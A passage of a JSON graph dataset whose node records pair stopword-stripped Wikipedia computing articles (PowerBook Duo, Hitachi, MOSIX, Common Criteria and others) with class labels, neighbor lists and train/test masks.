      10499,
      10883,
      394,
      1147,
      1804,
      3978,
      6797,
      7053,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      10731,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      3323,
      2172,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8890,
    "label": 3,
    "text": "Single-core:single-core single-core processor microprocessor single core chip running single thread one time term became common emergence multi-core processors several independent processors single chip distinguish non-multi-core designs example intel released core 2 solo core 2 duo one would refer former 'single-core variant microprocessors prior multi-core era single-core class many-core processors follows multi-core progression showing increasing parallelism time processors remained single-core impossible achieve performance gains increased clock speed transistor count allowed moore law diminishing returns increasing depth pipeline increasing cpu cache sizes adding execution units",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      2273,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      4399,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      6495,
      1376,
      8543,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 8891,
    "label": 7,
    "text": "Workboard:workboard workboard inc. enterprise saas company whose strategy results platform helps large organizations align quickly results workboard pioneered active strategy management category leveraging powerful okr technique distinctive enterprise-class technology workboard based redwood city california founded 2013 deidre paknad daryoush paknad deidre paknad history founding companies workboard including pss systems acquired ibm 2010 working ibm thought idea workboard dealing inefficiency tenure starting founding 2013 paknad co-founder daryoush paknad focused vq velocity quotient define speed organization able accomplish goal 2014 workboard secured seed money several venture capital firms including opus capital granite ventures crosslink capital announced series round december 2017 led floodgate microsoft ventures arjun chopra priya sapraisad joined board hundreds organizations use workboard including microsoft reliance industries transamerica samsung workboard also provides world okr coach certification program certified 300+ coaches to-date certified coaches experts implementing okrs organization",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8892,
    "label": 7,
    "text": "CDDLM:cddlm cddlm configuration description deployment lifecycle management specification global grid forum standard management deployment configuration grid service lifecycles inter-organization resources specification based component documents development api done global grid forum open standard model ietf standard development originally edited d. bell t. kojo p. goldsack s. loughran d. milojicic s. schaefer j. tatemura p. toft system administration distributed environment diverse hardware software patch level imposed user requirements makes ability deploy manage describe services software configuration difficult within grid difficulty complicated need similar service end points possibly heterogeneous architectures grid service requests may require configuration changes standard provided framework described language methods ability describe system configuration move system services software towards desired configuration endpoints furthermore served first real attempt address system administration issues within grid cddlm grids cfengine servers",
    "neighbors": [
      7935,
      9948,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 8893,
    "label": 3,
    "text": "PowerBook_Duo:powerbook duo powerbook duo line small subnotebooks manufactured sold apple computer 1992 1997 compact companion powerbook line improving upon powerbook 100 portability immediate predecessor apple third-smallest laptop duo came seven different models duo 210 230 250 270c 280 280c 2300c 210 230 earliest 2300c final incarnation entire line dropped early 1997 weighing mere slightly smaller sheet paper thick lightest smallest apple powerbooks time remains one apple smallest notebooks ever produced macbook air retina macbook pro retina macbook weigh less though wider deeper considerably thinner duo common original macbook air included one usb 2.0 port one video port requiring adapter one speaker port ability expansion powerbook duo line replaced powerbook 2400 slightly larger size duos still fifth-smallest behind 12-inch powerbook g4 succeeded fourth-smallest although featured much onboard functionality lacked docking ability duo line offered ultraportable design light functional travel expandable via unique docking connector however certain compromises made achieve level portability duo series used 88 standard desktop-sized keyboard criticized difficult type likewise trackball reduced size even used powerbook 100 usable port came standard duo dual printer/modem eia-422 serial port slot expensive optional internal 14.4 express modem provision built-in ethernet somewhat limited configuration meant way move data laptop stock configuration without purchasing additional accessories via relatively slow appletalk connection practical event hard drive problems compensating limitations initial duo offering provided considerably higher ram limit 24 mb compared 100 series 14 mb standard 80 mb hard drive versus 100 40 mb drive debut year duo offered passive matrix display mid-level high-end models contrast high end 100-series line duos shared processors powerbook 170 180 crisp active matrix displays already great demand lower-powered models passive matrix displays following year apple replaced earlier models active matrix display color active matrix display latter becoming de facto standard powerbook line respective duo models easily differentiated display method processor features identical 2xx duos powered either motorola 68030 68lc040 processors ranging 25-33 mhz apple debuted next-generation powerpc processors 1994 took nearly two years first powerpc duo 2300c debut original powerpc 601 like original 68040 produced much heat consumed much power apple use laptop end 1995 efficient powerpc 603e developed featured duo 2300c full-size companion powerbook 5300 series powerpc 603e designed 64-bit bus engineered apple run older 32-bit bus maintain compatibility duo docks led poor system video performance powerbook duos lacked common ports featuring one internal printer/modem serial port optional fax/modem card port place docking ability accomplished via unique 156-pin processor direct slot pds giving docks full access duo central processing unit cpu data buses several dock options offered apple third parties largest expensive dock powerbook duo form factor offered exclusively apple unlike docks port replicators plugged back laptops duo dock pulled laptop inside dock metal plastic case via internal sliding mechanism similar vhs player dock turned powerbook duo full-size ac-powered fully functional desktop computer standard ports like desktop computer dock could physically support heavy high-resolution crt display top duo dock included floppy drive side two nubus expansion slots optional floating-point unit fpu level 2 cache slot vram enable colors higher resolutions space second hard drive original duo dock replaced duo dock ii added aaui networking compatibility newer color-screen powerbook duos replacement lid offered allow use thicker color duos original duo dock dock ii followed duo dock plus identical duo dock ii lacked fpu level 2 cache—which compatible 68lc040-processor duo 280 powerpc-processor duo 2300c laptop lcd display obviously could opened inside dock additional nubus video cards could installed drive three monitors mini dock port expander powerbook duo popularly offered many third-party manufacturers apple attached powerbook duo could plugged various standard desktop devices including scsi apple desktop bus adb serial floppy disk external speakers external display type dock also allowed duo internal lcd battery used third-party contributions mini dock added variety specialized custom options including ethernet connectivity ntsc pal video ports significant difference docks full desktop configuration lack custom pds nubus expansion slots included standard desktop macs shortfall made task-specific third-party dock offerings type dock manufactured apple many third parties gave powerbook duo three extra ports minimal configuration examples include floppy scsi video ethernet docks typically included one adb port well least expensive basic docks type dock allowed duo internal lcd used well could run duo internal battery reduced amount time popular due minimal impact accessories must carried duo offered practical alternative emergency hard disk software situations task-specific needs 2300 last apple product carry vestige snow white design language apple phasing since 1990 drawing heavily upon improvements made original powerbook 140 design duo series continues many styling traits powerbook 100 approximately equivalent size weight addition snow white features duo takes 100 radius curves step along display top front sides also heavily mirrored various docks penlite early tablet computer prototyped apple computer 1993 around time apple newton pda rather complete computer project canceled 1994 due similarity newton penlite based powerbook duo meant tablet-style addition stylus input device designed compatible powerbook duo docks accessories ran standard classic mac os one stylish iconic laptops available time duo widely used advertising film television",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      5235,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      4244,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8894,
    "label": 9,
    "text": "Raster_Document_Object:raster document object .rdo raster document object file format native format used xerox docutech range hardware software underpins company xerox document demand xdod systems therefore significant file format print demand market sector along postscript pdf rdo metafile format based open document architecture oda specifications xerox rdo implementation description control information stored within rdo file raster images stored separately usually separate folder tiff files rdo file dictates bitmap images used page document placed approach advantages disadvantages monolithic approach used pdf disadvantages rdo largely proprietary format multi-file approach means file management orphan control issue one tell computer file system whether files required document print present correct rdo favor multi-file approach allows networked device load small rdo file request larger bitmap files necessary allows full job specification loaded installed network almost immediately larger bitmap files transferred needed allowing flexibility managing network traffic loading tiff file format highly portable xerox makeready software supplied xdod systems readily imports export postscript files however xerox demand systems typically require document library stored rdo tiff files non-xerox applications read rdo structures directly",
    "neighbors": [
      8628
    ],
    "mask": "None"
  },
  {
    "node_id": 8895,
    "label": 2,
    "text": "CSR_Classics:csr classics csr classics free-to-play drag-racing game boss alien collaboration mad atom games published naturalmotion games game player takes role new racer looking make name city resembling las vegas ruled five racing crews story line consists racer agent trying prove seemingly corrupt mr. baladin guilt worked way business magnate behind scenes csr classics follow-up title successful csr racing released october 2013 ios end march 2014 gradually released android via google play csr classics features game mechanics similar sister title features classic race cars ranging 1950s 1980s late march 2018 announced online features csr classics would discontinued may 1 2018 online features later discontinued update may 21 2018 player starts found agent recruits player player goes tutorial game player receives sum money sufficient purchase first vehicle afterwards meeting race official csr classics universe player guided various events throughout game starts challenging first crew authentics led marco player starts challenge marco personally defeating crew members agent approaches player explains suspicion mr. baledin recently became top crew leader purchased valentine massive casino agent suspicion mr. baledin corrupt crew leaders involvement reign power agent reveals marco tearaway child thief also romantic affair another crew leader kandy however ties mr. baledin yet known player proceeds defeat marco authentics progressing tier 2 tier 2 player proceeds challenge thrillers commandeered olivia player continues challenge olivia agent tells player olivia background olivia runs car show name experienced severe financial troubles came mr. baledin loan however loan little help financial situation olivia car show became debt mr. baledin olivia associates agreed race mr. baledin make loss player defeats olivia thrillers moving onto tier 3 player starts challenging lord aziz high rollers tier 3 crew beaten lord aziz crew starting challenge lord aziz agent informs player lord aziz lord aziz inherited wealth father recently passed large gambler lord aziz lost father wealth playing baccarat blamed mr. baledin rigged baccarat games despite working mr. baledin rule lord aziz highly despises mr. baledin player defeats lord aziz high rollers made tier 4 player next crew defeat tier 4 crew lucky 7 kandy ringleader player defeats kandy crew members proceeds challenge agent shines light upon kandy despite romantic relationship marco kandy seen multiple times flirting mr. baledin later revealed marco kandy performed heist valentine mr. baledin caught duo instead alerting authorities mr. baledin blackmailed kandy marco working player defeats kandy last time proceeds tier 5 tier 5 player starts challenging house mr. baledin rule player defeats mr. baledin crew starts challenge leader csr classics universe agent informs player plan arrest mr. baledin player would distract baledin continuously racing allowing authorities prepare trap valentine mr. baledin allowing easy arrest defeating mr. baledin third final time mr. baledin shown custody agent talks player informing csr classics league unanimously elected marco become new leader league vowing ameliorate player also congratulated former crew leaders victory secretly despised mr. baledin however player shown discussion jailed mr. baledin formerly unknown client discuss plan executed perfectly revealed marco end line actually behind business csr classics single-player component split five tiers tier introducing progressively faster opposition vehicles player gets challenge boss level player must first beat boss crew move new tier player must race beat crew boss level beating boss level three times player challenged high-stakes rematch player wins race awarded boss car car one tier tier however player loses must give back prize gold previous boss race unlike traditional racing game csr classics feature steering braking acceleration controls instead game focuses timing gear changes use nitrous upgrade tapping screen similar fashion rhythm game player comes buy car choose unloved loved cars unloved cars upgrades usually able purchased via main form in-game currency whereas loved cars come equipped several upgrades always mandate usage valuable in-game currency loved cars also multiplayer via prize cars building car pieces purchasing loved version reduced price races take place across track extending quarter mile events split several categories",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8896,
    "label": 3,
    "text": "Macintosh_Color_Classic:macintosh color classic macintosh color classic sold macintosh colour classic markets personal computer designed manufactured sold apple computer inc. february 1993 may 1995 all-in-one design integrated 10″ sony trinitron display supporting thousands colors video memory upgrade 512×384 pixel resolution color classic final model original compact family macintosh computers replaced larger-display macintosh lc 500 series power macintosh 5200 lc color classic motorola 68030 cpu running 16 mhz logic board similar macintosh lc ii like macintosh se se/30 color classic single expansion slot lc-type processor direct slot pds incompatible se slots primarily intended apple iie card primary reason color classic switchable 560x384 display essentially quadruple iie 280x192 high-resolution graphics offered education models lcs card allowed lcs emulate apple iie combination low-cost color macintosh apple iie compatibility intended encourage education market transition apple ii models macintoshes cards cpu accelerators ethernet video cards also made available color classic pds slot color classic shipped apple keyboard known apple keyboard ii m0487 featured soft power switch keyboard mouse supplied apple mouse known apple desktop bus mouse ii m2706 slightly updated model color classic ii featuring macintosh lc 550 logicboard 33 mhz processor released japan canada international markets 1993 sometimes performa 275 versions color classic 256 kb onboard vram expandable 512 kb plugging 256 kb vram simm onboard 68-pin vram slot name color classic printed directly front panel separate plastic insert enabled alternative spelling colour classic colour classic ii used appropriate markets color classic users upgraded machines motherboards performa/lc 575 units mystic upgrade others put entire performa/lc/quadra 630 successor innards takky upgrade based takky way upgrade color classic g3 cpu another common modification unit change display allow 640 × 480 resolution common requirement many programs especially games run introduced february 1 1993 introduced february 10 1993 introduced october 1 1993 introduced october 21 1993",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      10501,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 8897,
    "label": 4,
    "text": "Dmailer_Backup:dmailer backup dmailer backup developed dmailer backup software microsoft windows os x operating systems provisory could back restore data computer two modes application automatic mode launched backup user data documents video music custom mode choose data would backed software included online service called dmailer online 2 gb free lifetime allowed user send online existing backup app service suspended data retrieved anymore version 3.0 application free use without license costs",
    "neighbors": [
      3366,
      2280,
      1801,
      6797,
      1358,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 8898,
    "label": 3,
    "text": "Canon_Cat:canon cat canon cat task-dedicated desktop computer released canon inc. 1987 price surface unlike dedicated word processors popular late 1970s early 1980s far powerful incorporates many unique ideas data manipulation canon cat primarily creation jef raskin originator macintosh project apple leaving company 1982 began designing new computer closer original vision inexpensive utilitarian people computer byte 1987 described cat spiritual heir macintosh features text user interface making use mouse icons graphics data seen long stream text broken several pages instead using traditional command line interface menu system cat makes use special keyboard commands activated holding use front key pressing another key cat also uses special leap keys held allows user incrementally search strings characters machine hardware consists 9-inch 229 mm black-and-white monitor single 3½-inch 256 kb floppy disk drive ibm selectric–compatible keyboard uses motorola 68000 cpu like macintosh lisa atari st amiga running 5 mhz 256 kb ram internal 300/1200 bit/s modem setup user preference data stored 8 kb non-volatile battery backed-up ram cat array i/o interfaces encompasses one centronics parallel port one rs-232c serial port db-25 two rj11 telephone jacks modem loop total weight system 17 pounds 7.7 kg extensive range application software built 256 kb rom standard office suite programs communications 90,000 word spelling dictionary user programming toolchains forth assembly language text-only machine cat includes graphics routines rom well connectors mouse pointing device never used defunct software project called archy initiated raskin develop similar yet even capable system current computing systems project designed eventually replace current software user interfaces",
    "neighbors": [
      3904,
      1121,
      7041,
      7269,
      780,
      2383,
      1776,
      7983,
      4114,
      2843,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 8899,
    "label": 3,
    "text": "PowerPC_applications:powerpc applications microprocessors belonging powerpc architecture family used numerous applications apple computer dominant player market personal computers based powerpc processors 2006 switched intel-based processors apple used powerpc processors power mac imac emac powerbook ibook mac mini xserve classic macintosh accelerator boards using powerpcs made daystar digital newer technology sonnet technologies totalimpact several attempts create powerpc reference platforms computers ibm others ibm prep powerpc reference platform system standard intended ensure compatibility among powerpc-based systems built different companies ibm pop powerpc open platform open free standard design powerpc motherboards pegasos open desktop workstation odw open free standard design powerpc motherboards based marvell discovery ii mv64361 chipset prep standard specifies pci bus also support isa microchannel pcmcia prep-compliant systems able run os/2 aix solaris taligent windows nt chrp common hardware reference platform open platform agreed apple ibm motorola chrp systems able run mac os os/2-ppc windows nt aix solaris novell netware chrp superset prep powermac platforms power.org defined power architecture platform reference papr provides foundation development computers based linux operating system list computers based powerpc ibm apple cray sony ibm released personal digital assistant pda reference platform arctic based powerpc 405lp low power project discontinued ibm sold powerpc 4xx design amcc three major seventh-generation game consoles contain powerpc-based processors sony playstation 3 console released november 2006 contains cell processor including 3.2 ghz powerpc control processor eight closely threaded dsp-like accelerator processors seven active one spare microsoft xbox 360 console released 2005 includes 3.2 ghz custom ibm powerpc chip three symmetrical cores core smp-capable two threads nintendo wii console also released november 2006 contains extension powerpc architecture found previous system gamecube ibm sony zarlink semiconductor released several set top box stb reference platforms based ibm powerpc 405 cores ibm set top box stb system-on-chip soc",
    "neighbors": [
      291,
      4743,
      4264,
      5384,
      5642,
      8937,
      5339,
      3472,
      6834,
      9302,
      823,
      3323,
      8700,
      3677
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8900,
    "label": 4,
    "text": "Hitachi:hitachi hitachi listed tokyo stock exchange constituent nikkei 225 topix indices ranked 38th 2012 fortune global 500 129th 2012 forbes global 2000 hitachi founded 1910 electrical engineer namihei odaira ibaraki prefecture company first product japan first induction motor initially developed use copper mining company began in-house venture fusanosuke kuhara mining company hitachi ibaraki odaira moved headquarters tokyo 1918 odaira coined company toponymic name superimposing two kanji characters hi meaning “ sun ” tachi meaning “ rise. ” world war ii significant impact company many factories destroyed allied bombing raids discord war founder odaira removed company hitachi reconstruction efforts war hindered labor strike 1950 company saw increase business korean war due defense contracts offered american military meanwhile hitachi went public 1949 hitachi america ltd. established 1959 hitachi europe ltd. established 1982 march 2011 hitachi agreed sell hard disk drive subsidiary hgst western digital wd combination cash shares worth us 4.3 billion due concerns duopoly wd seagate technology eu commission federal trade commission hitachi 3.5 hdd division sold toshiba transaction completed march 2012 january 2012 hitachi announced would stop producing televisions japan september 2012 hitachi announced invented long-term data solution quartz glass capable preserving information millions years october 2012 hitachi agreed acquire united kingdom-based nuclear energy company horizon nuclear power plans construct six nuclear power plants uk e.on rwe £700 million november 2012 hitachi mitsubishi heavy industries agreed merge thermal power generation businesses joint venture owned 65 mitsubishi heavy industries 35 hitachi joint venture began operations february 2014 october 2015 hitachi completed deal johnson controls form joint-venture would takeover hitachi hvac business hitachi maintained 40 stake resulting company johnson controls-hitachi air conditioning may 2016 hitachi announced investing 2.8 billion iot interests february 2017 hitachi honda announced partnership develop produce sell motors electric vehicles march 14 2018 zoomdata announced partnership hitachi ins software help develop big data analytics market japan december 2018 hitachi ltd. announced would take abb ltd. power grid division 6.4 billion note new product hitachi called memory glass introduced 2015 high density information storage medium utilizing laser etched/readable fused quartz following fukushima daiichi nuclear disaster 2011 extended temporary closure japanese nuclear plants hitachi nuclear business became unprofitable 2016 hitachi ceo toshiaki higashihara argued japan consider merger various competing nuclear businesses hitachi taking 2016 estimated ¥65 billion write-off value silex technology laser uranium enrichment joint venture general electric 2019 hitachi suspended abwr development british subsidiary horizon nuclear power provide adequate economic rationality private enterprise proceed hitachi communication technologies america provides communications products services telecommunications cable tv utility enterprise industrial markets hitachi consulting international management technology consulting firm headquarters dallas texas founded 2000 currently employs approximately 6,500 people across united states japan united kingdom netherlands india spain portugal germany china brazil vietnam hitachi vantara wholly owned subsidiary hitachi provides hardware software services help companies manage digital data flagship products virtual storage platform enterprise storage hitachi unified storage vm large sized companies hitachi unified storage small mid-sized companies hitachi content platform archiving cloud architecture hitachi command suite storage management hitachi truecopy hitachi universal replicator remote replication hitachi nas platform since september 19 2017 hitachi data systems hds become part hitachi vantara new company unifies operations pentaho hitachi data systems hitachi insight group company name hitachi data systems hds logo longer used market hitachi manufactures many types electronic products including tvs camcorders projectors recording media brand name hitachi provides various defense related/derived products services among things hitachi metals supplies materials aircraft engines fuselage components e.g landing gear along finished components aerospace applications also provides materials components tools automotive electronics industries hitachi koki manufactures many types tools including chainsaws drills woodworking power tools branded koki tanaka march 1 2016 hitachi koki acquired german power tools manufacturer metabo chequers capital hitachi plant technologies ltd. along subsidiaries engages design development manufacture sale servicing execution social industrial infrastructure machinery mechatronics air-conditioning systems industrial plants energy plant equipment asia internationally hitachi rail rolling stock manufacturing division hitachi mitsubishi heavy industries agreed cooperate field international intra-city railway systems 2010 hitachi markets general-purpose train known a-train uses double-skin friction-stir-welded aluminium body construction a-train concept customised form different types trains ranging high-capacity commuter metro trains automated 3000 series train nanakuma line fukuoka city subway limited express e257 series jointly produced tokyu corporation high-speed trains class 395 trains southeastern uk made trains domestic international operators alike among significant orders winning tender uk department transport intercity express programme june 2008 hitachi many products include designing manufacturing many shinkansen models including n700 series shinkansen exported thsr 700t taiwan high speed rail company also markets driverless metro system developed hitachi rail italy pioneered copenhagen metro straddle beam monorail technology known hitachi monorail form basis trains operating world longest monorail system currently part chongqing rail transit network february 24 2015 hitachi agreed purchase italian rolling stock manufacturer ansaldobreda acquire finmeccanica stake ansaldo sts railway signaling division finmeccanica purchase completed later year point company renamed hitachi rail italy since hitachi obtained majority stake ansaldo sts hitachi solutions america consulting firm systems integrator focusing primarily microsoft dynamics firm utilizes ax crm dynamics family provide customers broad base solutions company international subsidiaries residing united kingdom canada philippines thailand japan india hitachi solutions america acquired ignify – another leading microsoft dynamics solution providers december 2015 hitachi solutions 2000 microsoft dynamics consultants worldwide acquisition ignify hitachi works oldest member hitachi group consists three factories kaigan works yamate works rinkai works yamate works oldest three factories founded 1910 namihei odaira electrical equipment repair manufacturing facility facility named hitachi hitachi mine near hitachi ibaraki regarded ancestral home hitachi ltd many management trainees intern hitachi works permanently assigned hitachi divisions senior management personnel often participants rotations hitachi works years career develops towards eventual head office stature result many senior managers hitachi ltd passed hitachi works spin-off entities hitachi works include hitachi cable 1956 hitachi canadian industries 1988 hitachi global storage technologies hitachi gst manufactures computer hard drives 3 main ranges hitachi travelstar hitachi deskstar hitachi ultrastar march 7 2011 hitachi global storage technologies purchased western digital corporation 3.5 billion cash 750 million western digital common stock hitachi printing systems established 1980 acquired ricoh 2004 becoming ricoh printing systems ltd. hitachi joint venture kerala public sector company telk 1963 1989 production electrical equipment collaboration hitachi telk first company manufacture 400kv transformers india telk transformers well known quality great demand indian power system august 2011 announced hitachi would donate electron microscope five universities indonesia university north sumatra medan indonesian christian university jakarta padjadjaran university bandung general soedirman university purwokerto muhammadiyah university malang hitachi group",
    "neighbors": [
      7297,
      11395,
      6148,
      9351,
      3722,
      7053,
      1298,
      5523,
      7068,
      7709,
      10140,
      9375,
      10658,
      8355,
      9894,
      4011,
      2861,
      9006,
      9137,
      2995,
      7607,
      1083,
      10811,
      8900,
      1480,
      2383,
      4563,
      7638,
      1376,
      2273,
      7269,
      3431,
      3304,
      3560,
      6248,
      9964,
      8944,
      6003,
      1141,
      6647,
      3960,
      4221,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 8901,
    "label": 7,
    "text": "MOSIX:mosix mosix proprietary distributed operating system although early versions based older unix systems since 1999 focuses linux clusters grids mosix cluster/grid need modify link applications library copy files login remote nodes even assign processes different nodes – done automatically like smp mosix researched developed since 1977 hebrew university jerusalem research team prof. amnon barak far ten major versions developed first version called mos multicomputer os 1981–83 based bell lab seventh edition unix ran cluster pdp-11 computers later versions based unix system v release 2 1987–89 ran cluster vax ns32332-based computers followed bsd/os-derived version 1991–93 cluster 486/pentium computers since 1999 mosix tuned linux x86 platforms second version mosix called mosix2 compatible linux-2.6 3.0 kernels mosix2 implemented os virtualization layer provides users applications single system image linux run-time environment allows applications run remote nodes run locally users run regular sequential parallel applications mosix transparently automatically seek resources migrate processes among nodes improve overall performance mosix2 manage cluster multicluster grid well workstations shared resources flexible management grid allows owners clusters share computational resources still preserving autonomy clusters ability disconnect nodes grid time without disrupting already running programs mosix grid extend indefinitely long trust cluster owners must include guarantees guest applications modified running remote clusters hostile computers connected local network nowadays requirements standard within clusters organizational grids mosix2 run native mode virtual machine vm native mode performance better requires modifications base linux kernel whereas vm run top unmodified operating system supports virtualization including microsoft windows linux mac os x. mosix2 suitable running compute intensive applications low moderate amount input/output i/o tests mosix2 show performance several applications 1 gbit/s campus grid nearly identical single cluster mosix suitable running hpc applications low moderate amount i/o tests mosix show performance several applications 1 gbit/s campus grid nearly identical single cluster particularly suitable examples mosix4 released july 2014 version 4 mosix n't require kernel patching mosix became proprietary software late 2001 moshe bar forked last free version started openmosix project february 10 2002 july 15 2007 bar decided end openmosix project effective march 1 2008 claiming increasing power availability low cost multi-core processors rapidly making single-system image ssi clustering less factor computing plans reconfirmed march 2008 linuxpmi project continuing development former openmosix code",
    "neighbors": [
      8992,
      5506,
      5956,
      330,
      5452,
      6797,
      7983,
      499,
      11604,
      118,
      823,
      2264
    ],
    "mask": "Test"
  },
  {
    "node_id": 8902,
    "label": 2,
    "text": "Data_General_RDOS:data general rdos data general rdos real-time disk operating system real-time operating system released 1970 software sold bundled company popular nova eclipse minicomputers rdos capable multitasking ability run 32 called tasks similar current term threads simultaneously two grounds foreground background within 64 kb memory space later versions rdos compatible data general 16-bit eclipse minicomputer line cut-down version rdos without real-time background foreground capability still capable running multiple threads multi-user data general business basic called data general diskette operating system dg-dos somewhat confusingly simply dos another related operating system rtos real-time operating system diskless environments rdos micronova-based micro products micro-minicomputers sometimes called dg/rdos rdos superseded early 1980s data general aos family operating systems including aos/vs mp/aos mp/os smaller systems following list commands supported rdos/dos cli late 1970s data general sued sherman clayton antitrust acts competitors practice bundling rdos data general nova eclipse minicomputer data general introduced data general nova company called digidyne wanted use rdos operating system hardware clone data general refused license software claimed bundling rights 1985 courts including united states court appeals ninth circuit ruled data general case called digidyne v. data general supreme court united states declined hear data general appeal although justices white blackmun would heard precedent set lower courts eventually forced data general license operating system restricting software data general hardware illegal tying arrangement 1999 data general taken emc corporation",
    "neighbors": [
      512,
      2179,
      6675,
      9366,
      8729,
      8999,
      2345,
      7983,
      5046,
      7483,
      6207,
      4423,
      5969,
      3418,
      477,
      96,
      5359,
      5363,
      3960
    ],
    "mask": "Train"
  },
  {
    "node_id": 8903,
    "label": 8,
    "text": "Keyword_Tool_(software):keyword tool software keyword tool free saas product uses google autocomplete search engines generate relevant long-tail keywords related keywords topic keyword tool launched middle 2014. created artem galimov leow kah thong started providing keywords 83 languages autocomplete 194 google domains 2015 keyword tool participated startup chile 13th generation program keywordtool helps user locate long-tail related keywords relies google autocomplete feature giving quick access popular search terms scrapes keyword suggest ideas google youtube bing amazon ebay app store",
    "neighbors": [
      467,
      9063
    ],
    "mask": "Train"
  },
  {
    "node_id": 8904,
    "label": 4,
    "text": "Common_Criteria:common criteria common criteria information technology security evaluation referred common criteria cc international standard iso/iec 15408 computer security certification currently version 3.1 revision 5 common criteria framework computer system users specify security functional assurance requirements sfrs sars respectively security target st may taken protection profiles pps vendors implement make claims security attributes products testing laboratories evaluate products determine actually meet claims words common criteria provides assurance process specification implementation evaluation computer security product conducted rigorous standard repeatable manner level commensurate target environment use common criteria evaluations performed computer security products systems evaluation process also tries establish level confidence may placed product security features quality assurance processes far pps evaluated sts/certified products components e.g. firewalls operating systems smart cards common criteria certification sometimes specified procurement standards containing e.g. interoperation system management user training supplement cc product standards examples include iso/iec 17799 properly bs 7799-1 iso/iec 27002 german details cryptographic implementation within toe outside scope cc instead national standards like fips 140-2 give specifications cryptographic modules various standards specify cryptographic algorithms use recently pp authors including cryptographic requirements cc evaluations would typically covered fips 140-2 evaluations broadening bounds cc scheme-specific interpretations national evaluation schemes phasing eal-based evaluations accept products evaluation claim strict conformance approved pp united states currently allows pp-based evaluations canada process phasing eal-based evaluations cc originated three standards cc produced unifying pre-existing standards predominantly companies selling computer products government market mainly defence intelligence use would need evaluated one set standards cc developed governments canada france germany netherlands uk u.s. testing laboratories must comply iso/iec 17025 certification bodies normally approved iso/iec 17065 compliance iso/iec 17025 typically demonstrated national approval authority characteristics organizations examined presented iccc 10 well common criteria standard also sub-treaty level common criteria mra mutual recognition arrangement whereby party thereto recognizes evaluations common criteria standard done parties originally signed 1998 canada france germany united kingdom united states australia new zealand joined 1999 followed finland greece israel italy netherlands norway spain 2000 arrangement since renamed common criteria recognition arrangement ccra membership continues expand within ccra evaluations eal 2 mutually recognized including augmentation flaw remediation european countries within former itsec agreement typically recognize higher eals well evaluations eal5 tend involve security requirements host nation government september 2012 majority members ccra produced vision statement whereby mutual recognition cc evaluated products lowered eal 2 including augmentation flaw remediation vision indicates move away assurance levels altogether evaluations confined conformance protection profiles stated assurance level achieved technical working groups developing worldwide pps yet transition period fully 